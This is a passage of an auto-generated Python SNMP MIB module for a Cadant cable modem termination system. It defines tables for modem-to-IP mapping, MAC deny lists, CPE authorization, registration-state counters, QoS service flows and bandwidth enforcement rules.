cadCmtsCmVendorName = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 20, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 46)).clone('(unspecified)')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadCmtsCmVendorName.setStatus('current')
cadCmtsCmVendorRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 20, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadCmtsCmVendorRowStatus.setStatus('current')
cadIfCmtsMacToIpTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21), )
if mibBuilder.loadTexts: cadIfCmtsMacToIpTable.setStatus('current')
cadIfCmtsMacToIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsMacAddr"))
if mibBuilder.loadTexts: cadIfCmtsMacToIpEntry.setStatus('current')
cadIfCmtsMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadIfCmtsMacAddr.setStatus('current')
cadIfCmtsMacCmMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21, 1, 3), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsMacCmMacAddr.setStatus('current')
cadIfCmtsMacInetIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21, 1, 4), InetAddressIPv4or6().clone(hexValue="00000000")).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsMacInetIpAddr.setStatus('deprecated')
cadIfCmtsMacInetIpAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 21, 1, 5), InetAddressType().clone('ipv4')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsMacInetIpAddrType.setStatus('deprecated')
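# cadCmDenyTable: operator-configurable list (RowStatus) of CM MAC addresses to be denied; attempts are tracked in cadCmDenyStatusTable.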
cadCmDenyTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 22), )
if mibBuilder.loadTexts: cadCmDenyTable.setStatus('current')
cadCmDenyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 22, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadCmDenyMacAddress"))
if mibBuilder.loadTexts: cadCmDenyEntry.setStatus('current')
cadCmDenyMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 22, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadCmDenyMacAddress.setStatus('current')
cadCmDenyRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 22, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadCmDenyRowStatus.setStatus('current')
cadCmDenyStatusTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 23), )
if mibBuilder.loadTexts: cadCmDenyStatusTable.setStatus('current')
cadCmDenyStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 23, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadCmDenyMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadCmDenyRecentIfIndex"))
if mibBuilder.loadTexts: cadCmDenyStatusEntry.setStatus('current')
cadCmDenyRecentIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 23, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: cadCmDenyRecentIfIndex.setStatus('current')
cadCmDenyRecentTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 23, 1, 2), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmDenyRecentTime.setStatus('current')
cadCmDenyAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 23, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmDenyAttempts.setStatus('current')
cadCpeHostAuthorizationTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24), )
if mibBuilder.loadTexts: cadCpeHostAuthorizationTable.setStatus('current')
cadCpeHostAuthorizationEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadCpeHostAuthCmMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadCpeHostAuthCpeMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadCpeHostAuthCpeIpAddress"))
if mibBuilder.loadTexts: cadCpeHostAuthorizationEntry.setStatus('current')
cadCpeHostAuthCmMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24, 1, 1), MacAddress())
if mibBuilder.loadTexts: cadCpeHostAuthCmMacAddress.setStatus('current')
cadCpeHostAuthCpeMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24, 1, 2), MacAddress())
if mibBuilder.loadTexts: cadCpeHostAuthCpeMacAddress.setStatus('current')
cadCpeHostAuthCpeIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24, 1, 3), IpAddress())
if mibBuilder.loadTexts: cadCpeHostAuthCpeIpAddress.setStatus('current')
cadCpeHostAuthRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 24, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadCpeHostAuthRowStatus.setStatus('current')
cadIfCmtsInetIpToCmMacTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25), )
if mibBuilder.loadTexts: cadIfCmtsInetIpToCmMacTable.setStatus('current')
cadIfCmtsInetIpToCmMacEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsInetIpMacAddrType"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsInetIpMac"))
if mibBuilder.loadTexts: cadIfCmtsInetIpToCmMacEntry.setStatus('current')
cadIfCmtsInetIpMacAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25, 1, 1), InetAddressType())
if mibBuilder.loadTexts: cadIfCmtsInetIpMacAddrType.setStatus('current')
cadIfCmtsInetIpMac = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25, 1, 2), InetAddressIPv4or6())
if mibBuilder.loadTexts: cadIfCmtsInetIpMac.setStatus('current')
cadIfCmtsInetIpCmMac = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25, 1, 3), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsInetIpCmMac.setStatus('current')
cadIfCmtsInetIpCpeMac = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 25, 1, 4), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsInetIpCpeMac.setStatus('current')
cadCmtsCmStatusMacSummaryTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26), )
if mibBuilder.loadTexts: cadCmtsCmStatusMacSummaryTable.setStatus('deprecated')
cadCmtsCmStatusMacSummaryEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1), ).setIndexNames((0, "CADANT-CMTS-LAYER2CMTS-MIB", "cadIfMacDomainIfIndex"))
if mibBuilder.loadTexts: cadCmtsCmStatusMacSummaryEntry.setStatus('deprecated')
cadCmtsCmStatusMacNumOther = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumOther.setStatus('deprecated')
cadCmtsCmStatusMacNumInitRanging = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumInitRanging.setStatus('deprecated')
cadCmtsCmStatusMacNumRangingComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRangingComplete.setStatus('deprecated')
cadCmtsCmStatusMacNumStartEae = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumStartEae.setStatus('deprecated')
cadCmtsCmStatusMacNumStartDhcpv4 = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumStartDhcpv4.setStatus('deprecated')
cadCmtsCmStatusMacNumStartDhcpv6 = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumStartDhcpv6.setStatus('deprecated')
cadCmtsCmStatusMacNumDhcpv4Complete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumDhcpv4Complete.setStatus('deprecated')
cadCmtsCmStatusMacNumDhcpv6Complete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumDhcpv6Complete.setStatus('deprecated')
cadCmtsCmStatusMacNumStartCfgFileDownload = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumStartCfgFileDownload.setStatus('deprecated')
cadCmtsCmStatusMacNumCfgFileDownloadComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumCfgFileDownloadComplete.setStatus('deprecated')
cadCmtsCmStatusMacNumStartRegistration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumStartRegistration.setStatus('deprecated')
cadCmtsCmStatusMacNumRegistrationComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRegistrationComplete.setStatus('deprecated')
cadCmtsCmStatusMacNumOperational = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumOperational.setStatus('deprecated')
cadCmtsCmStatusMacNumBpiInit = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumBpiInit.setStatus('deprecated')
cadCmtsCmStatusMacNumForwardingDisabled = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumForwardingDisabled.setStatus('deprecated')
cadCmtsCmStatusMacNumRfMuteAll = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 16), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRfMuteAll.setStatus('deprecated')
cadCmtsCmStatusMacNumTotal = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 17), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumTotal.setStatus('deprecated')
cadCmtsCmStatusMacNumRangingAborted = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRangingAborted.setStatus('deprecated')
cadCmtsCmStatusMacNumRangFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRangFlaps.setStatus('deprecated')
cadCmtsCmStatusMacNumProvFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 20), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumProvFlaps.setStatus('deprecated')
cadCmtsCmStatusMacNumRegFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 26, 1, 21), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacNumRegFlaps.setStatus('deprecated')
cadCmtsCmStatusMacChSummaryTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27), )
if mibBuilder.loadTexts: cadCmtsCmStatusMacChSummaryTable.setStatus('current')
cadCmtsCmStatusMacChSummaryEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1), ).setIndexNames((0, "CADANT-CMTS-LAYER2CMTS-MIB", "cadIfMacDomainIfIndex"), (0, "CADANT-CMTS-LAYER2CMTS-MIB", "cadMacChlChannelIfIndex"))
if mibBuilder.loadTexts: cadCmtsCmStatusMacChSummaryEntry.setStatus('current')
cadCmtsCmStatusMacChNumOther = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumOther.setStatus('current')
cadCmtsCmStatusMacChNumInitRanging = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumInitRanging.setStatus('current')
cadCmtsCmStatusMacChNumRangingComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRangingComplete.setStatus('current')
cadCmtsCmStatusMacChNumStartEae = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumStartEae.setStatus('current')
cadCmtsCmStatusMacChNumStartDhcpv4 = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumStartDhcpv4.setStatus('current')
cadCmtsCmStatusMacChNumStartDhcpv6 = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumStartDhcpv6.setStatus('current')
cadCmtsCmStatusMacChNumDhcpv4Complete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumDhcpv4Complete.setStatus('current')
cadCmtsCmStatusMacChNumDhcpv6Complete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumDhcpv6Complete.setStatus('current')
cadCmtsCmStatusMacChNumStartCfgFileDownload = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumStartCfgFileDownload.setStatus('current')
cadCmtsCmStatusMacChNumCfgFileDownloadComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumCfgFileDownloadComplete.setStatus('current')
cadCmtsCmStatusMacChNumStartRegistration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumStartRegistration.setStatus('current')
cadCmtsCmStatusMacChNumRegistrationComplete = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRegistrationComplete.setStatus('current')
cadCmtsCmStatusMacChNumOperational = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumOperational.setStatus('current')
cadCmtsCmStatusMacChNumBpiInit = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumBpiInit.setStatus('current')
cadCmtsCmStatusMacChNumForwardingDisabled = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumForwardingDisabled.setStatus('current')
cadCmtsCmStatusMacChNumRfMuteAll = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 16), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRfMuteAll.setStatus('current')
cadCmtsCmStatusMacChNumTotal = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 17), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumTotal.setStatus('current')
cadCmtsCmStatusMacChNumRangingAborted = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRangingAborted.setStatus('current')
cadCmtsCmStatusMacChNumRangFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRangFlaps.setStatus('current')
cadCmtsCmStatusMacChNumProvFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 20), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumProvFlaps.setStatus('current')
cadCmtsCmStatusMacChNumRegFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 27, 1, 21), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadCmtsCmStatusMacChNumRegFlaps.setStatus('current')
cadQosServiceFlowSidClusterTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28), )
if mibBuilder.loadTexts: cadQosServiceFlowSidClusterTable.setStatus('current')
cadQosServiceFlowSidClusterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "DOCS-QOS3-MIB", "docsQosServiceFlowId"), (0, "DOCS-QOS3-MIB", "docsQosServiceFlowSidClusterId"), (0, "CADANT-CMTS-MAC-MIB", "cadQosServiceFlowSidClusterChIfIndex"))
if mibBuilder.loadTexts: cadQosServiceFlowSidClusterEntry.setStatus('current')
cadQosServiceFlowSidClusterChIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: cadQosServiceFlowSidClusterChIfIndex.setStatus('current')
cadQosServiceFlowSidClusterUcid = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosServiceFlowSidClusterUcid.setStatus('current')
cadQosServiceFlowSidClusterSid = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 16383))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosServiceFlowSidClusterSid.setStatus('current')
cadQosServiceFlowSegHdr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 28, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("on", 1), ("off", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosServiceFlowSegHdr.setStatus('current')
cadIfCmtsMacToInetIpTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 29), )
if mibBuilder.loadTexts: cadIfCmtsMacToInetIpTable.setStatus('current')
cadIfCmtsMacToInetIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 29, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsMacAddr"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsMacToInetIpAddrType"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsMacToInetIpAddr"))
if mibBuilder.loadTexts: cadIfCmtsMacToInetIpEntry.setStatus('current')
cadIfCmtsMacToInetIpAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 29, 1, 1), InetAddressType())
if mibBuilder.loadTexts: cadIfCmtsMacToInetIpAddrType.setStatus('current')
cadIfCmtsMacToInetIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 29, 1, 2), InetAddressIPv4or6())
if mibBuilder.loadTexts: cadIfCmtsMacToInetIpAddr.setStatus('current')
cadIfCmtsMacToInetIpCmMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 29, 1, 3), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsMacToInetIpCmMacAddr.setStatus('current')
cadEnforceRule = MibIdentifier((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30))
cadEnforceRuleTableLastChange = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 1), Counter32()).setUnits('seconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadEnforceRuleTableLastChange.setStatus('current')
cadEnforceRuleTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2), )
if mibBuilder.loadTexts: cadEnforceRuleTable.setStatus('current')
cadEnforceRuleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadEnforceRuleReferenceSCN"))
if mibBuilder.loadTexts: cadEnforceRuleEntry.setStatus('current')
cadEnforceRuleReferenceSCN = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 1), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(1, 15)))
if mibBuilder.loadTexts: cadEnforceRuleReferenceSCN.setStatus('current')
cadEnforceRuleEnforceSCN = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 2), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(0, 15))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRuleEnforceSCN.setStatus('current')
cadEnforceRuleAvgBwRateUsageTrigger = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(100, 500000))).setUnits('kilobits per second').setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRuleAvgBwRateUsageTrigger.setStatus('current')
cadEnforceRuleAvgHistoryDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(30, 1440)).clone(60)).setUnits('minutes').setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRuleAvgHistoryDuration.setStatus('current')
cadEnforceRuleSamplingInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(5, 5), ValueRangeConstraint(10, 10), ValueRangeConstraint(15, 15), ValueRangeConstraint(30, 30), )).clone(15)).setUnits('minutes').setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRuleSamplingInterval.setStatus('current')
cadEnforceRulePenaltyDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(30, 10080)).clone(60)).setUnits('minutes').setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRulePenaltyDuration.setStatus('current')
cadEnforceRuleCreateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 7), Counter32()).setUnits('seconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadEnforceRuleCreateTime.setStatus('current')
cadEnforceRuleStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 2, 1, 8), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cadEnforceRuleStatus.setStatus('current')
cadEnforceRuleCountsTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 3), )
if mibBuilder.loadTexts: cadEnforceRuleCountsTable.setStatus('current')
cadEnforceRuleCountsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 3, 1), )
cadEnforceRuleEntry.registerAugmentions(("CADANT-CMTS-MAC-MIB", "cadEnforceRuleCountsEntry"))
cadEnforceRuleCountsEntry.setIndexNames(*cadEnforceRuleEntry.getIndexNames())
if mibBuilder.loadTexts: cadEnforceRuleCountsEntry.setStatus('current')
cadEnforceRuleCountsPenalties = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 30, 3, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadEnforceRuleCountsPenalties.setStatus('current')
cadQosServiceClassControl = MibIdentifier((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31))
cadQosServiceClassControlTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 1), )
if mibBuilder.loadTexts: cadQosServiceClassControlTable.setStatus('current')
cadQosServiceClassControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 1, 1), )
docsQosServiceClassEntry.registerAugmentions(("CADANT-CMTS-MAC-MIB", "cadQosServiceClassControlEntry"))
cadQosServiceClassControlEntry.setIndexNames(*docsQosServiceClassEntry.getIndexNames())
if mibBuilder.loadTexts: cadQosServiceClassControlEntry.setStatus('current')
cadQosServiceClassControlSendDsc = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 1, 1, 1), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cadQosServiceClassControlSendDsc.setStatus('current')
cadQosServiceClassControlSendDscLastUpdated = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 1, 1, 2), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadQosServiceClassControlSendDscLastUpdated.setStatus('current')
cadQosServiceClassCmControlTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 2), )
if mibBuilder.loadTexts: cadQosServiceClassCmControlTable.setStatus('current')
cadQosServiceClassCmControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 31, 2, 1), )
docsQosServiceClassEntry.registerAugmentions(("CADANT-CMTS-MAC-MIB", "cadQosServiceClassCmControlEntry"))
cadQosServiceClassCmControlEntry.setIndexNames(*docsQosServiceClassEntry.getIndexNames())
